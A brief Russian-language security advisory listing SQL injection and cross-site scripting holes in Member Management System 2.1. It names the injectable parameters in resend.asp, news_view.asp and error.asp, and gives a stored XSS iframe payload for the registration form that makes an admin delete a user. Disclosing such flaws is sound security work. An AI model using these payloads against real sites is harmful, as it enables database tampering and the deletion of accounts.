Уязвима Member Management System 2.1. Выполнение
произвольных SQL команд:
http://[host]/resend.asp?ID=[SQL query]
http://[host]/news_view.asp?ID=[SQL query]
Выполнение скриптов в register.asp и error.asp:
http://[host]/error.asp?err=">[XSS]
Например, удаление пользователя. В
регистрационной форме:
"><iframe src=http://[host]/admin/user_del.asp?ID=[ID to delete]>
